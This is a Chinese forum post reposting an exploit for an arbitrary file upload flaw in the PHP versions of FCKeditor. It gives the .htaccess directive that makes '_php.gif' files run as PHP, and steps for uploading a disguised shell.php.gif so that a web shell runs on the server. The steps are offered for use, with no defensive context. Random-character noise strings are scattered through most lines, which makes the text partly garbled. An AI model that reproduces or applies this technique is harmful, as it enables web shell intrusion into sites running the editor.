找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2219|回复: 0
打印 上一主题 下一主题

FCKeditor所有php版本Upload上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-10-27 17:25:21 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
FCKeditor所有php版本Upload上传漏洞4 v6 u4 l/ b3 n9 W4 g' m# z6 T
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
+ Z3 w+ V  o) P# C# o- T2 D减小字体 增大字体
* u. m% @7 D6 @  Z0 L4 _[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability0 j' c* `$ ~! F- M
[+] Date: 2011
3 F+ K: `$ j2 C$ m  c2 q0 c' _[+] Author : sinesafe.cn
3 u  e% L3 a! K  ?/ v6 J[+] Website : WwW.sinesafe.cn/ w/ n' s) H1 ^, z) T5 z1 P
———————————————————
2 H* M# _3 _! u6 ~& Y7 u1.create a htaccess file:
+ H$ J% C* s) }- h$ P1 Z7 E5 wcode:2 w! |0 d- i, J6 I" ~
<FilesMatch “_php.gif”>8 v; f- ?4 m" [7 x
SetHandler application/x-httpd-php
) Z: L* H: b* x6 D9 @0 |* n8 P</FilesMatch>
8 `% I+ O& W: ]- k8 V* i9 L3 l
0 n  V9 w6 O7 }0 C6 X2 `. p2.Now upload this htaccess with FCKeditor.
! p) I7 ^5 m; ~% R# Q! S0 ^% h8 a1 \5 \1 d- T+ E
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html0 G. i+ M" s7 i1 s$ v
  z, g$ w( n) e$ Y! x" Q1 S
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html  l/ v. ?0 p" }3 C8 t
% G8 Z& ^4 ^# l% M
———————————————————————————————-
! |) w" x1 m. g+ ~: H. k4 G2 @3.Now upload shell.php.gif with FCKeditor.6 e, m: y! E5 D: B$ a7 a
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.1 f- i9 F3 k1 `0 B9 N3 ~
5.http://www.sinesafe.cn/anything/shell_php.gif
/ v+ a6 L* \  N: c* \. d6.Now shell is available from server.

# D# w9 s$ h  a0 U4 B+ Q0 R" w8 w/ N3 b( K) C
3 L/ k# @" M3 {8 U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表